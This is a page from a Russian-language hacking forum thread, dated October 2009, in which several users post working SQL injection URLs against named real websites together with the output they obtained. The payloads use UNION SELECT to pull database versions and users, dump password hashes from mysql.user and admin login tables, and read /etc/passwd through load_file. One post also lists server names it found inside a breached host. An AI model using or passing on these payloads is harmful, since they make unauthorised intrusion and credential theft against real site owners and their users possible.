ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11021  
Старый 24.10.2009, 00:34
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.chu-cme.org/backoffice/newsletter/preview.php?id=15+UNION+SELECT+1,user(),3,4,5,6,7, 8

Database Version: 5.0.67
Database name: chucme
User name: chucme@localhost
 
Ответить с цитированием

  #11022  
Старый 24.10.2009, 01:15
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

www.hackzone.ru
==================

5.0.27-log : root@ : localhost : root : : Y
http://www.manuals.ws/files/list.php?cat=-1+union+select++1,2,concat_ws(0x203a20,version(),u ser(),host,user,password,file_priv),4,5+from+mysql .user--
http://www.manuals.ws/files/list.php?cat=-1+union+select+1,2,load_file(0x2f6574632f706173737 764),4,5--

В конфигах Апача пути до:
ServerName cracks.hackzone.ru
ServerName mbloc.hackzone.ru
ServerName nod32.hackzone.ru
ServerName www.hackzone.ru
ServerName thecracks.us
ServerName www.crackspider.de
ServerName needcrack.us
ServerName cracks.thebugs.us
ServerName serials.thebugs.us
ServerName www.crackway.com
ServerName www.crackportal.com
ServerName bestcracks.net

и др.

работает outfile.

Посмотрел на Хакзону изнутри, полезно.
Просьба, не вредить проекту.
 
Ответить с цитированием

  #11023  
Старый 24.10.2009, 01:20
MaxRaziel
Новичок
Регистрация: 23.10.2009
Сообщений: 1
Провел на форуме:
3961

Репутация: 6
По умолчанию

http://www.aoya-hk.com/news.php?id=-1%20union%20select%201,user(),database(),4,5,6,7,8 ,9,10,11/*
 
Ответить с цитированием

  #11024  
Старый 24.10.2009, 21:19
min7
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022

Репутация: 259
По умолчанию

Код:
http://www.jordan-home.net/current-news.php?news=-31+union+select+1,2,concat_ws(char(58),user(),database(),version()),4,5--
alla5sam_site@uk3.valuehost.co.uk:alla5sam_site:4. 0.27-max-log
Уязвимы все сайты от 21web.ru с mysql
 
Ответить с цитированием

  #11025  
Старый 25.10.2009, 08:26
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://petfoods.dk/index.php4?traeid=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())+--+
User: root@localhost
Database: dbpetfoods
Version: 5.0.27

Цитата:
http://www.alecto.dk/sider/index.php4?traeid=-481+union+select+version()
Version: 5.0.27

На user() и database() отвечает ошибкой.

Последний раз редактировалось Ctacok; 25.10.2009 в 08:45..
 
Ответить с цитированием

  #11026  
Старый 25.10.2009, 20:33
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

Цитата:
Сообщение от Ctacok  
На user() и database() отвечает ошибкой.
http://www.alecto.dk/sider/index.php4?traeid=-481+union+select+hex(user())
http://www.alecto.dk/sider/index.php4?traeid=-481+union+select+hex(database())
root@localhost : dbalecto

---------------------

5.0.51a-3ubuntu5.1 : root@10.2.22.101 : localhost : root : Y
http://www.combatlifestyle.com/mov/view_movie.php?id=-1+union+select+1,2,3,concat_ws(0x203a20,version(), user(),host,user,password,file_priv),5,6,7,8,9,10, 11,12,13,14,15,16,17,18+from+mysql.user--
http://www.combatlifestyle.com/mov/view_movie.php?id=-1+union+select+1,2,3,load_file(0x2f6574632f7061737 37764),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
 
Ответить с цитированием

  #11027  
Старый 25.10.2009, 20:48
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.naesekorrektion.dk/printview.php4?uniq_id=-1010007+union+select+1,2,3,4,5,concat_ws(0x3a,user (),database(),version()),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23+--+
User: frederiksb@linux1.123hotel.dk
Database: frederiksborgklinikken_dk_db
Version: 4.1.22-standard
 
Ответить с цитированием

  #11028  
Старый 25.10.2009, 21:43
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

Код:
http://www.maindata.info/index.php?id=-1+union+select+1--
4.0.27-standard
maindatask
maindatask@10.2.194.84
 
Ответить с цитированием

  #11029  
Старый 25.10.2009, 21:44
Amdell_13
Новичок
Регистрация: 03.07.2009
Сообщений: 3
Провел на форуме:
132694

Репутация: -4
По умолчанию

Цитата:
http://www.turkeyexportline.com/category.php?IndustryID=4+union+select+1,2,concat_ ws(0x3a,loginid,password)+from+admin--
http://worldb2b.org/category.php?IndustryID=9+union+select+1,2,concat_ ws(0x3a,loginid,password)+from+admin--
http://www.caribzar.com/category.php?IndustryID=25+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.lebargain.co.cc/category.php?IndustryID=4+union+select+1,2,concat_ ws(0x3a,loginid,password)+from+admin--
http://www.lankahub.com/category.php?IndustryID=44+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.caribzar.com/category.php?IndustryID=23+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.singhbaba.com/category.php?IndustryID=68+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://justclone.com/alibabaclone/category.php?IndustryID=20+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://buyerxpo.com/category.php?IndustryID=34+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.ores21.com/category.php?IndustryID=49+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.lebargain.co.cc/category.php?IndustryID=27+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.euroindiam.com%20;%20www.ores21.com/category.php?IndustryID=65+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
XD
 
Ответить с цитированием

  #11030  
Старый 25.10.2009, 22:15
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

Код:
http://www.fibertech.jp/eng/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9--
User: asu1340@localhost
Version: 5.0.83
Database: asu1340
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ